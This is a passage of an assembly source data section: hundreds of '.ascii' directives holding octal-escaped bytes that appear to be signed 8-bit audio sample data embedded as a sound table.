"\357\354\352\346\343\341\341\340\343\347\350\351\354" .ascii "\361\364\370\376\005\013\020\026\027\031\032\033\032" .ascii "\034!!!!#\037\034\030\025\023\021\017\013\012\011\007" .ascii "\003\003\006\005\007\012\014\014\014\012\010\007\007" .ascii "\010\005\011\013\013\011\011\010\005\004\002\001\377" .ascii "\375\371\363\361\360\355\352\355\361\363\365\367\372" .ascii "\372\374\373\373\375\000\001\377\002\003\001\376\377" .ascii "\377\375\374\372\370\364\362\353\346\345\345\343\342" .ascii "\347\352\353\355\360\363\366\372\375\001\007\015\017" .ascii "\021\030\035 \"',...-*($!\"!\037\034\036\035\033\027" .ascii "\030\025\024\023\021\017\016\016\011\010\012\014\013" .ascii "\014\021\022\022\021\022\020\021\021\017\020\022\025" .ascii "\023\022\024\025\023\023\025\023\022\020\015\011\007" .ascii "\004\376\374\373\371\363\360\355\350\343\336\332\326" .ascii "\325\325\325\325\331\335\336\344\353\362\367\376\005" .ascii "\011\016\022\024\026\033\037 #&)&&$\"\035\031\026\020" .ascii "\015\010\002\375\374\371\365\365\365\366\365\366\365" .ascii "\364\364\364\364\364\370\371\372\373\377\000\377\000" .ascii "\000\001\377\376\373\371\370\366\361\357\361\360\357" .ascii "\356\360\360\356\355\353\352\351\350\346\346\351\351" .ascii "\347\347\352\351\351\350\351\350\346\344\340\337\336" .ascii "\334\332\334\340\342\344\347\354\356\361\363\366\370" .ascii "\374\376\376\002\005\007\007\013\020\021\021\023\025" .ascii "\024\023\022\017\017\017\016\013\015\016\016\014\015" .ascii "\016\014\013\013\013\012\012\010\006\007\007\007\005" .ascii "\007\011\010\006\006\005\001\000\376\374\373\373\372" .ascii "\371\375\376\376\375\000\001\001\000\000\377\375\375" .ascii "\372\370\367\367\364\362\362\360\354\347\345\340\334" .ascii "\330\324\322\321\322\320\321\324\331\333\337\346\352" .ascii "\357\364\371\375\001\006\012\016\022\030\031\033\036" .ascii "\037\035\034\033\030\026\022\016\012\010\005\001\376" .ascii "\376\375\371\367\367\365\362\357\356\353\354\353\353" .ascii "\353\357\361\361\363\366\370\367\370\371\370\367\366" .ascii "\364\363\364\364\362\363\366\367\366\367\367\366\365" .ascii "\363\361\357\357\355\353\351\352\351\346\345\345\344" .ascii "\341\337\336\334\332\331\327\327\332\333\334\340\345" .ascii "\350\353\357\364\370\372\376\001\005\011\014\016\022" .ascii "\027\030\032\033\036\035\033\033\030\026\022\021\015" .ascii "\015\015\013\012\013\015\013\013\013\015\013\013\013" .ascii "\012\013\013\014\013\016\020\020\020\023\024\022\021" .ascii "\020\017\015\013\011\006\007\006\005\003\004\005\003" .ascii "\002\002\002\377\376\375\374\374\373\372\370\372\371" .ascii "\367\364\363\361\355\352\347\344\342\341\340\337\342" .ascii "\344\346\350\356\361\364\370\374\000\002\006\010\013" .ascii "\017\023\025\030\034\037\037!\"\" \037\034\032\027\025" .ascii "\021\017\016\015\011\005\006\003\003\000\003\000\002" .ascii "\000\001\377\001\000\000\000\004\002\002\001\003\001" .ascii "\377\367\341\003\015\341\334\374\355\017\344\013D\347" .ascii "\024O\031<)\336\026\023\341\345\365\3717\366\006\367" .ascii "\006\005\322D\376\354\003\334\371!\305\267\325\317\021" .ascii "!\017\011$\020\361\351\351\001\030\032\023\370\354\356" .ascii "\322\272\330\344\304\275\262\273\333\000\341\356\341" .ascii "\325\357\305\302\256\263\275\275\263\320\303\350\370" .ascii "\327\002\370!.\015\0139;\022\005\362\347\374\375\357" .ascii "\375\017*'\007\005*3GDC>MH9= 1\027\033\036 *-\024%," .ascii "(E\0259K;3(\021\020,\000\362\012\016\021\373\344\346" .ascii "\360\372\014\375\363\024\022\366\372\010\001\034\006" .ascii "\324\367\364\336\343\273\272\314\331\332\307\354\367" .ascii "\341\013\367\352\037\345\301\301\340\346\356\373\351" .ascii "\000\020\034\037&,=*.\031\033&*\"\030FMME-.E<>9FI-/" .ascii "&\0375$\004\370\343\367\374\342\326\360\360\355\001" .ascii "\363\360\364\366\317\302\304\326\313\250\304\275\276" .ascii "\273\304\254\301\323\311\356\344\360\362\333\306\326" .ascii "\327\343\334\316\304\260\302\266\255\306\305\340\361" .ascii "\326\345\020$\021 $\"6+\025\023\365\020\002\331\344" .ascii "\353\373\007!\0352JI'->IO3,\036$\033\022/<:=.8?:@?%" .ascii "$7\027\012\027\373\363\374\357\371\010\030\032\021\022" .ascii "\036*\036\001\017\376\365\375\342\353\353\343\352\350" .ascii "\372#')\376\014\036\012\004\350\337\337\331\265\302" .ascii "\277\303\315\325\324\342\371\340\324\272\322\367\370" .ascii "\376\013\006\014\025\003\362\374\016\002\021\001\026" .ascii ";4HAPnVMC08\031\030\012\001$!\016\022\032\035\034%\030" .ascii "\006\"\025\015\020\020\032\017\356\356\352\343\344\334" .ascii "\320\341\356\353\362\353\357\366\360\351\351\341\372" .ascii "\336\326\322\274\333\311\270\306\314\324\331\326\311" .ascii "\342\346\314\320\310\307\320\304\264\273\306\341\342" .ascii "\341\357\001\011\371\001\000\001\012\363\341\343\337" .ascii "\347\342\322\330\341\371\001\356\377\014\035+\031-<" .ascii "1:6+/;\034\006\026 -'(5<DB-=QL>25091\020\026\030%(\022" .ascii "%(34)@>=E75?@'!\033\006\020\373\350\352\356\355\351" .ascii "\342\355\371\373\001\360\344\320\304\263\231\255\257" .ascii "\263\305\273\330\336\330\347\336\347\001\007\371\353" .ascii "\366\006\370\373\376\377\020\013\370\360\373\375\374" .ascii "\001\375\005\032\021\015\373\370\000\346\343\333\345" .ascii "\346\347\347\330\364\003\373\004\372\002#\017\015\006" .ascii "\000\016\006\364\365\371\376\373\352\367\377\026\034" .ascii "\026\025'2\031\015\021\011\006\374\357\360\352\362\353" .ascii "\325\331\367\373\372\372\006\017,(\026#\017\036\014" .ascii "\357\357\347\345\331\317\327\333\347\362\360\364\002" .ascii "\004\372\373\357\363\377\362\346\353\360\366\351\337" .ascii "\341\352\372\006\000\375\026 \015\003\013\002\004\370" .ascii "\352\360\357\360\352\335\354\002\010\021\004\021\036" .ascii "\034\037\006\011\034\015\001\001\375\005\014\004\002" .ascii "\023/@54@D;$\036\023\032\027\001\366\003\010\374\010" .ascii "\361\377\010\367\366\356\366\014\017\013\014\020!\032" .ascii "\023\003\004\021\020\005\011#[email protected] \016\011\376" .ascii "\003\376\366\354\366\004\372\007\001\001\011\377\362" .ascii "\345\353\356\340\313\301\302\321\310\302\312\321\347" .ascii "\340\331\334\345\356\342\330\332\335\344\327\320\313" .ascii "\273\307\305\272\302\316\330\322\325\322\327\347\322" .ascii "\315\312\310\325\311\275\303\312\323\331\322\344\354" .ascii "\366\364\342\361\370\372\363\354\354\355\366\364\343" .ascii "\336\352\356\352\356\003\015\027)\036 -6*'* / \020\036" .ascii "\030\031\036\031'(55,3<?@85<+$!\034\034$\036\033'29" .ascii "505?>B@?H@.#'\036\022\023\002\011\024\015\013\012\016" .ascii "\022\020\011\375\362\354\322\307\273\271\311\316\322" .ascii "\327\345\356\364\366\364\373\002\007\010\376\007\012" .ascii "\005\004\374\003\007\001\376\364\374\003\363\370\362" .ascii "\363\376\360\352\352\346\343\333\321\312\315\322\316" .ascii "\310\314\315\320\327\317\320\330\350\340\332\337\343" .ascii "\337\321\320\314\312\315\322\314\326\333\343\351\347" .ascii "\357\360\372\361\360\374\362\362\350\333\340\334\341" .ascii "\337\332\335\342\356\360\361\377\013\022\022\017\017" .ascii "\004\012\373\360\366\364\367\362\366\373\370\006\021" .ascii "\016\027\037*%!'$0%\027\" !$\"(0/007>?=-.**!\036\035" .ascii "\027\033\032\025\030\031\035\031\030$+''\"\034\032\031" .ascii "\025\011\024\013\025\034\020\035'$\"\035\035\036\021" .ascii "\015\002\370\371\364\356\350\342\344\335\324\315\316" .ascii "\310\276\274\303\307\314\331\331\326\332\342\337\336" .ascii "\337\344\345\346\351\351\365\377\375\014\017\021\035" .ascii "\020\023\017\004\003\365\363\356\345\345\340\334\341" .ascii "\336\346\355\357\356\361\371\355\352\346\342\334\334" .ascii "\335\327\330\340\337\333\342\350\356\352\363\364\362" .ascii "\370\361\365\365\356\362\353\352\356\353\357\354\352" .ascii "\361\364\370\374\371\375\375\370\370\372\364\362\370" .ascii "\366\360\366\376\375\372\372\000\000\006\011\006\010" .ascii "\011\007\004\007\012\004\011\013\377\012\012\012\020" .ascii "\016\033\034\"'(*-+-(+4*(%%\"!$\037\034\"$'\"%& \"\033" .ascii "\032\027\027\020\012\017\013\011\016\006\014\022\017" .ascii "\027\023\025\036\035\035 \"\"\036\030\020\010\000\374" .ascii "\367\361\366\367\363\366\365\362\355\353\340\330\325" .ascii "\320\304\273\267\272\271\274\311\307\324\332\336\357" .ascii "\354\355\371\370\370\376\377\005\004\001\004\003\007" .ascii "\004\007\014\006\003\006\001\367\372\374\363\361\361" .ascii "\357\361\354\353\344\337\340\335\337\335\341\341\332" .ascii "\342\337\344\355\345\356\353\347\355\353\344\346\343" .ascii "\342\350\347\350\353\360\355\354\360\366\367\367\372" .ascii "\371\366\372\364\351\353\351\344\343\345\352\357\357" .ascii "\363\366\370\371\003\000\000\002\372\000\371\365\374" .ascii "\363\364\370\370\376\002\004\011\014\022\026\032! $" .ascii "\"\" \037\036\034\037#%&+.,+202//.)*%\036!\034\034 " .ascii "\030 \037! \036 \037\035\030\025\030\026\026\027" .ascii "\035\036\037!# \035\031\030\023\022\012\010\004\377" .ascii "\370\364\365\356\354\346\332\332\330\320\323\310\313" .ascii "\326\321\330\333\334\344\345\347\350\356\362\364\367" .ascii "\370\375\001\006\012\015\021\030\022\021\023\016\006" .ascii "\376\372\363\360\362\356\352\354\353\353\353\356\354" .ascii "\352\355\345\345\343\333\336\333\324\325\322\325\327" .ascii "\325\326\326\332\332\334\344\343\344\343\337\337\337" .ascii "\341\335\334\336\336\342\340\345\346\344\347\343\345" .ascii "\345\346\345\341\345\343\336\341\335\333\343\333\337" .ascii "\345\341\344\344\346\351\351\352\355\357\366\365\373" .ascii "\376\004\004\010\013\015\015\022\017\025\025\027\027" .ascii "\031\035\031\036\027\033\012\011\025\"\020\007\372\353" .ascii "\314#O\375\001\363\356\020\354\341\371\005\001\010\351" .ascii "\377>\344\375\312\026\373\036\005\342B\262\277\314\024" .ascii "\344\303\360\335\263\353\367\007H\007\346\325\366\011" .ascii "\011\373\001\016\350\023\037\035B0,\013\012\367\001" .ascii "\015\345\327\332\351\344\015\343\335\325\323\366\310" .ascii "\341\260\266\325\333\304\340\365\341\000\003#-\025\033" .ascii "2#8\011\024\016\025\366\350&9N<23(\0152\035\024\006" .ascii "\371\356\365\374\337\332\277\262\324\322\321\312\302" .ascii "\357\323\373\017\013\036\034\026*3%:$\030/**L:02'@<" .ascii "#6/\"24/**3>5)\021\015\354\340\320\272\326\255\264\257" .ascii "\255\315\311\354\371\010\376\356\352\344(\035(4\012" .ascii "\017\0310\036 \"\010\001\011\005\373\346\351\372\006" .ascii "*'\003\006\360\351\010\354\002\000\323\355\360\360\374" .ascii "\330\316\327\335\337\337\333\346\342\331\376\011\004" .ascii "\002\022\017\0214F'\026\034\017 '\032\375\350\345\350" .ascii "\331\322\335\335\347\305\315\310\313\325\306\345\335" .ascii "\355\352\354\331\277\302\303\332\333\336\335\333\356" .ascii "\014#%\0211\034\0276;.\017\030\011\010\025\036\033)" .ascii ",$*\"\016\374\363\376\355\363\352\342\333\272\321\315" .ascii "\351\356\331\336\353\004\014\026\"\037\020\031 2=*'" .ascii "\022\017*D\036\013\017\0360%18?)+57>1\"\036':A?3\037" .ascii "\375\364\364\364\344\312\301\266\276\303\342\334\316" .ascii "\325\344\362\370\357\321\324\323\343\366\007\007\020" .ascii "\014\013\010\003+\014\376\012\031\016\033:@NVSOSB. " .ascii " \015\025\371\360\343\322\322\305\304\311\271\243\273" .ascii "\257\271\311\322\310\336\346\343\372\376\375\361\370" .ascii "\373\014\025\016\005\362\374\015\003\013\362\366\371" .ascii "\354\004\010\370\006\370\346\376\010\034\024\016\371" .ascii "\361\351\350\334\322\307\247\274\300\307\311\302\306" .ascii "\324\352\371\357\375\372\342\332\334\366\343\347\353" .ascii "\351\366\004\024\025\022\016\015\015\027+&\026\376\023" .ascii ".$@#\035\"><+@360321#\016\001\004\374\373\364\351\347" .ascii "\344\334\343\342\371\354\332\356\002\032\007\033\022" .ascii "\022\010 /07.2.=45\036\020\017\034\030\015\024\034\021" .ascii "\015\0375<.\015\360\374\346\355\353\336\344\340\346" .ascii "\351\346\333\325\314\320\357\355\347\361\360\006\000" .ascii "\025.\030,\032\015\021\001\001\370\347\351\350\352\356" .ascii "\345\336\320\333\336\360\367\367\355\364\370\033(\036" .ascii "!\017\031\037\021\002\024\363\377\353\345\364\355\353" .ascii "\324\326\324\336\344\352\342\335\332\346\345\356\344" .ascii "\347\354\311\350\355\307\302\263\245\274\277\263\264" .ascii "\264\302\320\344\362\366\376\370\374\376\016\021\026" .ascii "\020\002\376\004\025\030\020\005\031\033\015\023%\037" .ascii "\014\021\035\030\035!\034!# 29-*\035\034\037%\035\023" .ascii "\011\362\353\360\375\363\354\337\352\366\346\367\004" .ascii "\001\361\363\014\034\021\035\022\020\032\030\" \031" .ascii "\027\034$/82#\036\0241\"((\017\017&)$8)\031\027\012" .ascii "\013\015\340\337\323\327\340\333\343\336\327\332\336" .ascii "\354\361\364\362\355\367\006\031\021,\030\024/\025\027" .ascii "\023\002\376\345\350\342\326\323\311\300\315\343\332" .ascii "\360\345\346\352\363\001\016\016\013\004\003\014\012" .ascii "\032\016\006\364\376\377\365\361\345\345\347\345\375" .ascii "\365\352\002\352\367\012\002\011\003\373\376\364\372" .ascii "\000\370\357\336\325\316\313\275\301\266\265\264\266" .ascii "\303\316\343\336\335\332\376\003\376\370\362\347\330" .ascii "\354\335\342\325\326\327\341\355\362\372\360\363\373" .ascii "\013\024\030\031\033 '4E<@><A3>G4.\037\0361\030\033" .ascii "\035\024\033\031\"\037\033\034\026\"!\036\036\025\023" .ascii "\024\020\022\012\375\002\374\001\374\005\003\005\000" .ascii "\002\016\011\375\354\000\361\004\007\005\001\376\001" .ascii "\374\007\365\370\350\332\314\306\312\313\317\323\332" .ascii "\340\365\366\002\020\015\022\027'55<;;HEOFA1\030'\026" .ascii "\027\014\002\377\363\376\366\371\374\361\356\361\366" .ascii "\371\370\363\357\355\354\347\351\333\324\320\305\322" .ascii "\312\307\304\271\306\313\274\321\331\306\311\331\344" .ascii "\345\354\353\350\337\344\347\364\360\362\361\351\355" .ascii "\351\354\343\342\335\344\345\350\360\370\373\007\012" .ascii "\026\032\030!\031\026\016\012\003\013\376\370\366\367" .ascii "\376\362\375\373\001\011\005\015\014\010\012\017\027" .ascii "\027\030\030\023\024\023\023\024\020\016\001\004\011" .ascii "\376\372\374\373\371\372\372\003\002\004\001\000\001" .ascii "\006\023\007\016\022\010\015\024\022\011\014\011\012" .ascii "\020\017\022\023\031\036#(.,+)).*0,$ )\036\037\031\011" .ascii "\007\370\360\346\342\335\324\325\331\332\363\361\362" .ascii "\364\363\005\022\017\025\026\021\034\034#\037 \037\033" .ascii "\030\023\013\006\377\370\360\363\356\355\350\354\347" .ascii "\335\355\347\354\356\352\356\336\327\353\340\327\325" .ascii "\333\336\334\337\327\335\330\334\335\334\346\351\350" .ascii "\351\357\361\370\371\371\372\373\373\373\372\371\376" .ascii "\371\372\377\000\374\372\367\371\373\355\371\355\361" .ascii "\364\361\373\375\020\001\016\014\014\016\003\004\367" .ascii "\367\354\345\353\347\345\347\346\357\361\365\374\374" .ascii "\000\001\004\010\013\014\011\013\012\020\006\011\017" .ascii "\007\011\007\376\006\004\373\004\372\376\374\002\003" .ascii "\012\005\012\020\015\030\017\022\024\033\026\025\032" .ascii "\031\026\026\024\023\027\031\032\030\033\037%)..0//" .ascii ".,,.+#\034 \030\025\015\012\007\366\371\351\347\335" .ascii "\331\344\330\332\342\353\356\365\370\377\004\011\014" .ascii "\013\021\027\032\031\033\032\033\034\031\027\022\016" .ascii "\011\006\002\000\374\371\364\364\366\354\361\360\347" .ascii "\341\351\351\352\341\336\336\331\335\335\324\332\337" .ascii "\332\325\322\332\327\345\340\335\347\351\353\356\356" .ascii "\353\360\363\362\363\361\357\363\355\361\362\363\364" .ascii "\364\366\365\370\365\366\366\364\367\365\370\370\375" .ascii "\372\000\002\002\005\376\377\371\367\366\354\361\370" .ascii "\354\362\367\373\371\376\010\003\020\020\020\030\026" .ascii "\031\037\031\025\032\030\030\030\022\024\021\020\021" .ascii "\015\014\012\012\010\010\011\010\007\012\013\016\016" .ascii "\016\010\014\016\010\013\011\011\001\377\377\371\377" .ascii "\001\375\000\376\003\005\016\015\016\031\031\030\027" .ascii "\031\033\032\026\034\023\021" .ascii "\015\016\013\004\003\374\374\367\361\353\347\342\340" .ascii "\336\336\340\344\352\357\364\367\000\005\014\016\020" .ascii "\024\026\035$$\037((/,(.#)%\033\035\025\027\031\013" .ascii "\017\010\006\013\005\001\375\375\367\364\357\354\356" .ascii "\351\345\345\342\343\341\341\343\342\342\344\343\344" .ascii "\344\344\343\344\343\343\342\336\335\335\334\327\331" .ascii "\332\334\334\330\334\342\337\334\340\336\332\342\336" .ascii "\342\333\333\340\332\344\340\340\346\340\345\346\341" .ascii "\337\340\342\341\337\345\357\356\361\370\000\002\013" .ascii "\016\027\030\033\035\036\037! !#\"\"\"\"#$$$$/$.\026" .ascii ")\013 \032\0065\015=F97/ \030\025,\024\011\014\010\030" .ascii "\002\014\001\007\037\374*0\0164\024)&2;2\007\020\020" .ascii "\360\345\333\377\323\373\332\337\326\347\371\313\333" .ascii "\342\351\333\371\334\314\312\313\303\310\305\360\332" .ascii "\336\001\364\037/$\0177%5\037\375\032\016\377\363\356" .ascii "\357\017\012\354\357\005\032\026\024\021\021\017\024" .ascii "\013\337\345\337\335\312\322\354\352\367\355\364\363" .ascii "\010\026\011\005\036\010\024\012\332\002\365\341\351" .ascii "\327\325\366\360\364\362\003\036\035\023\015\036\031" .ascii "\006\355\341\344\345\342\347\321\335\372\370\333\333" .ascii "\373\375\367\370\365\000\011\374\337\335\367\354\350" .ascii "\344\327\362\011\371\011\001\0250# \034-$\020\012\374" .ascii "\376\015\010\370\365\012\015\000\001\020\023&#\032\037" .ascii "%-\024\014\002\006\007\001\361\351\372\374\361\001\003" .ascii "\014%\010\027\037\036\"\020\006\002\017\023\373\367" .ascii "\375\376\012\001\003\010\022\"\021\006\035\033\016\371" .ascii "\351\341\344\343\313\310\311\324\327\326\341\350\000" .ascii "\016\374\000\015\021\032\010\376\012\016\017\012\003" .ascii "\011\032$\037\030,<B7+-82\033\014\017\020\377\363\353" .ascii "\365\372\373\364\366\010\023\026\007\003\007\012\007" .ascii "\371\355\366\361\342\344\334\336\357\354\344\350\370" .ascii "\003\003\375\362\375\004\366\351\346\355\360\345\326" .ascii "\315\327\343\343\335\335\366\002\372\362\352\362\363" .ascii "\351\324\315\327\320\310\277\271\310\324\311\313\322" .ascii "\350\000\374\371\372\015\021\007\001\367\004\005\363" .ascii "\353\352\375\010\004\003\015\035))!\035)-\027\016\006" .ascii "\021\016\372\365\364\003\015\003\006\015\032,\036\033" .ascii "#)*\031\015\010\022\020\376\365\373\012\024\022\021" .ascii "\03509-#(/(\031\013\013\017\010\370\353\357\373\376" .ascii "\362\360\366\000\007\370\362\371\374\376\355\336\344" .ascii "\351\350\333\327\342\363\376\373\001\020(-(+3:9)\030" .ascii "\033 \030\004\377\004\012\012\006\003\017\034\030\012" .ascii "\012\025\031\020\372\362\363\363\351\331\324\337\351" .ascii "\350\346\351\366\004\004\372\366\376\005\373\346\337" .ascii "\343\343\333\315\312\326\340\340\334\340\363\000\376" .ascii "\367\367\003\005\372\350\335\342\335\323\304\277\314" .ascii "\321\320\317\323\344\360\353\344\344\357\364\346\332" .ascii "\332\341\342\333\320\326\352\367\364\364\377\022\037" .ascii "\033\027\035(*\036\020\016\021\023\007\375\000\017\027" .ascii "\016\015\030'/'\035$+*\035\017\015\021\016\001\370\373" .ascii "\010\015\007\005\021\"+$\036(40#\026\025\030\024\005" .ascii "\373\377\014\020\010\010\021!'\034\027\031\034\026\001" .ascii "\363\357\356\344\323\311\316\330\333\324\326\350\371" .ascii "\000\373\375\010\025\020\005\377\004\016\015\377\375" .ascii "\014\030\032\024\033%44''(/'\016\002\010\005\371\354" .ascii "\345\355\362\365\352\356\377\007\011\377\376\012\016" .ascii "\000\362\350\355\355\342\325\321\334\344\343\334\343" .ascii "\364\000\377\367\370\002\005\371\353\344\352\353\340" .ascii "\324\321\335\345\341\333\340\357\371\364\354\355\365" .ascii "\367\350\330\322\327\325\312\274\277\314\324\325\317" .ascii "\337\361\374\376\370\000\014\021\011\372\372\006\004" .ascii "\374\360\364\006\011\010\005\016\",'\")1-\037\020\017" .ascii "\023\014\377\365\371\006\011\010\003\020\"% \034!+'" .ascii "\027\014\010\016\012\377\365\374\007\013\007\007\023" .ascii "#)\"\037&-'\030\013\013\013\004\365\353\357\371\370" .ascii "\357\355\367\002\002\366\360\364\372\363\344\333\336" .ascii "\345\340\326\325\340\356\365\364\372\016 &$'394(\035" .ascii " !\026\007\002\012\020\016\011\011\026\037\035\030\022" .ascii "\033\035\021\004\374\374\372\363\350\342\351\362\357" .ascii "\353\356\375\005\004\001\377\010\011\001\364\354\362" .ascii "\357\346\335\335\346\352\352\352\361\375\004\001\376" .ascii "\000\006\006\372\357\350\350\346\333\320\317\325\331" .ascii "\326\322\330\343\351\350\345\347\356\357\350\340\337" .ascii "\343\342\335\332\336\352\361\363\367\001\017\027\030" .ascii "\027\034!!\031\021\017\021\016\005\000\002\010\013\010" .ascii "\007\015\026\031\030\026\031\034\030\020\012\006\010" .ascii "\003\374\367\367\000\002\001\000\010\023\025\022\023" .ascii "\026\030\030\017\012\012\013\003\376\370\374\002\001" .ascii "\376\377\010\015\017\013\013\013\011\003\371\357\351" .ascii "\346\340\323\314\316\322\324\322\331\340\352\360\357" .ascii "\363\374\002\003\377\000\004\011\010\005\010\015\025" .ascii "\026\031\034$()%%('!\030\022\020\016\006\377\375\376" .ascii "\000\000\376\001\007\013\012\011\010\013\012\006\377" .ascii "\373\372\370\362\356\354\360\362\363\363\367\376\002" .ascii "\005\003\006\010\011\005\377\375\373\371\364\357\356" .ascii "\361\364\363\362\366\371\373\373\367\370\370\366\360" .ascii "\347\345\342\336\334\327\327\332\334\335\341\350\360" .ascii "\367\372\375\003\010\013\012\007\010\014\014\013\011" .ascii "\014\017\022\022\024\032\037 \" \"\" \033\024\024\021" .ascii "\015\010\004\003\006\006\006\007\014\021\023\022\022" .ascii "\024\025\022\015\011\007\006\001\377\374\375\001\002" .ascii "\002\004\012\016\020\020\020\020\021\016\011\004\000" .ascii "\377\372\364\360\360\357\354\351\347\350\350\346\343" .ascii "\341\341\340\335\330\327\326\326\327\326\327\335\344" .ascii "\351\356\366\377\006\015\020\024\031\034\034\030\027" .ascii "\026\025\021\014\012\012\012\011\010\011\014\016\017" .ascii "\013\013\013\012\006\376\374\372\370\362\356\354\360" .ascii "\361\361\361\363\367\372\373\372\374\374\375\371\367" .ascii "\365\363\361\357\356\355\360\360\363\364\366\372\376" .ascii "\375\376\376\376\376\373\367\363\360\355\350\345\343" .ascii "\342\342\342\341\342\346\347\347\347\350\352\352\350" .ascii "\350\351\352\353\354\356\361\367\374\000\006\015\022" .ascii "\030\032\034 !# \037\035\033\032\027\025\025\025\026" .ascii "\026\027\031\033\034\034\033\034\033\032\027\023\022" .ascii "\021\016\013\012\011\012\013\012\013\016\021\022\023" .ascii "\024\025\025\025\023\021\017\016\014\012\011\007\011" .ascii "\011\010\012\013\015\015\013\011\010\005\001\373\365" .ascii "\357\352\345\337\335\332\332\332\332\336\341\345\350" .ascii "\353\360\364\367\372\375\376\002\006\010\012\015\020" .ascii "\023\026\031\033\036 ! \035\032\027\024\020\016\012" .ascii "\006\004\002\001\000\377\000\377\001\001\000\000\001" .ascii "\000\375\373\370\366\365\363\361\357\361\362\362\362" .ascii "\365\367\372\373\373\375\374\375\373\372\370\367\365" .ascii "\363\362\361\361\361\360\360\361\362\361\360\357\355" .ascii "\354\351\346\342\337\335\332\330\326\326\330\331\334" .ascii "\337\342\347\354\357\364\370\375\000\001\004\005\010" .ascii "\011\012\013\014\017\020\021\024\026\027\030\031\032" .ascii "\031\031\030\025\023\020\017\014\011\010\007\010\010" .ascii "\007\010\012\013\014\013\014\014\013\012\011\006\005" .ascii "\004\002\001\000\001\002\002\004\005\007\011\012\013" .ascii "\013\013\012\011\006\005\003\000\375\372\370\365\364" .ascii "\361\356\354\353\350\346\345\342\340\337\335\334\333" .ascii "\333\333\334\336\340\344\350\354\362\370\375\004\010" .ascii "\015\022\025\031\031\032\033\031\032\027\025\025\023" .ascii "\023\022\021\022\021\020\015\011\007\006\006\003\002" .ascii "\000\001\377\377\376\376\375\377\376\000\000\002\003" .ascii "\003\006\003\007\375\001\365\370\370\003\362\0151\002" .ascii "\006\367\003\376\364\011\017\000\011(\004\377\030\006" .ascii "\364\010\004\374\031\022\014\026\370\363\010\026\377" .ascii "\376\012\360\341\372\363\345\006\325\331\341\332\352" .ascii "\330\312\302\331\312\334\363\371\363\341\334\353\354" .ascii "\363\022\361\336\357\015\000\015'\375\016\014\346\006" .ascii "\363\362\000\333\357\357\351\000\005\037-/*\012\012" .ascii "\012\376\371\002\366\337\340\331\310\315\360\005\020" .ascii "\030$\027\377\016)\033\022 \024\023! %&\373\010\374" .ascii "\372\015\376\034\014\004\007\370\367\004\001\012\023" .ascii "\007\012\021\016\000\013\012\012$-.2+'\023\014%\"'1" .ascii ",1FL<>3\030#\035\010\005\355\345\321\313\331\322\340" .ascii "\357\360\003\006\365\344\313\303\333\364\375\010\012" .ascii "\003\376\374\366\374\010\020\022\012\015\015\004\007" .ascii "\012\024'7.\035\036\006\375\000\346\356\366\363\366" .ascii "\362\366\356\346\351\345\344\356\347" .ascii "\363\365\351\362\370\366\366\376\375\374\377\000\371" .ascii "\357\345\344\336\340\342\353\344\337\340\317\323\324" .ascii "\321\341\337\336\350\331\336\350\352\363\357\360\357" .ascii "\333\346\344\332\344\347\353\360\370\003 422/\034\024" .ascii "\015\001\370\355\343\324\310\310\311\317\325\350\357" .ascii "\357\370\364\366\374\000\006\017\020\024\025\027\034" .ascii "\030\033\025\020\022\022 \"\"(%\036\025\027\026\017" .ascii "\023\020\011\012\007\006\377\370\000\377\006\016\022" .ascii "\022\017\017\005\012\014\022\034\035 09EG@<11+%\034" .ascii "\020\001\366\353\346\351\356\361\364\365\356\335\304" .ascii "\262\257\266\311\327\342\354\356\360\354\356\363\365" .ascii "\377\007\015\023\021\027\034%7AEF?7)\033\022\004\001" .ascii "\374\371\371\367\357\351\341\330\323\325\331\333\337" .ascii "\340\343\342\343\342\341\342\352\361\365\372\371\364" .ascii "\360\357\353\361\364\367\375\373\372\365\360\357\352" .ascii "\353\350\344\344\341\341\341\333\332\333\325\322\322" .ascii "\321\316\317\320\320\325\336\351\373\016\037*)'\036" .ascii "\027\020\017\013\003\001\370\362\356\352\357\363\367" .ascii "\374\376\000\376\375\376\374\373\376\377\005\012\015" .ascii "\017\017\014\011\012\012\020\031\037%))% \"%),.+)#" .ascii "\031\026\022\020\026\026\026\024\016\011\004\000\000" .ascii "\003\012\020\027\")-.*''&#!\035\024\014\006\002\003" .ascii "\007\016\023\023\020\004\357\331\312\304\310\323\334" .ascii "\344\351\347\346\345\343\346\355\364\374\001\004\007" .ascii "\012\021\033*5:=:3*\"\031\023\021\021\022\022\020\012" .ascii "\001\370\360\351\350\350\350\350\346\342\334\327\323" .ascii "\320\321\326\332\341\343\342\341\335\334\335\341\350" .ascii "\357\365\366\366\366\364\365\367\370\371\374\376\375" .ascii "\375\372\365\360\352\346\342\337\332\325\317\313\311" .ascii "\311\316\332\350\365\001\007\010\004\376\371\367\364" .ascii "\365\365\364\363\361\362\364\371\000\007\020\026\031" .ascii "\033\032\027\024\023\020\020\021\022\023\020\014\006" .ascii "\000\376\377\003\010\015\021\021\020\016\013\014\016" .ascii "\023\033!%'&$! !#(+,+' \033\027\025\025\030\032\037" .ascii "\"\" \034\027\023\017\016\014\011\004\375\370\363\362" .ascii "\364\371\377\004\006\002\367\351\333\321\322\330\342" .ascii "\355\365\371\372\370\370\366\370\373\000\003\004\004" .ascii "\003\004\005\013\024\033\037 \035\027\017\010\001\376" .ascii "\375\377\002\004\005\002\376\372\365\365\367\372\374" .ascii "\377\375\371\364\355\347\343\341\341\343\344\342\336" .ascii "\331\324\320\316\320\324\331\334\336\337\336\335\335" .ascii "\336\341\345\352\357\362\364\364\364\363\361\362\361" .ascii "\361\357\353\350\343\337\337\341\347\356\365\372\372" .ascii "\367\361\352\344\337\334\334\333\333\333\333\335\340" .ascii "\346\355\366\377\007\016\023\026\027\030\031\033\036" .ascii "\"%&%#\037\032\027\026\026\027\027\026\023\016\011\005" .ascii "\003\003\005\010\014\017\020\020\017\016\016\020\024" .ascii "\027\034\037 \037\036\036 #',1442.(\"\035\027\022\014" .ascii "\005\375\367\361\355\354\355\356\356\354\346\336\323" .ascii "\311\305\305\313\323\335\346\356\363\370\374\001\006" .ascii "\013\021\025\030\032\034\035 #&((%\037\027\020\007\001" .ascii "\373\367\366\364\363\362\360\355\352\351\352\353\356" .ascii "\361\362\363\363\362\361\357\357\360\361\363\364\364" .ascii "\363\360\355\353\350\350\347\347\346\345\343\340\335" .ascii "\333\332\332\333\334\337\341\342\344\344\345\346\346" .ascii "\347\347\347\347\346\346\347\352\356\364\372\000\003" .ascii "\005\003\000\373\366\362\355\352\347\345\343\343\344" .ascii "\345\351\355\363\370\375\002\006\011\013\014\017\021" .ascii "\024\030\034\037 !\"\"#$%'('%\"\037\035\032\030\030" .ascii 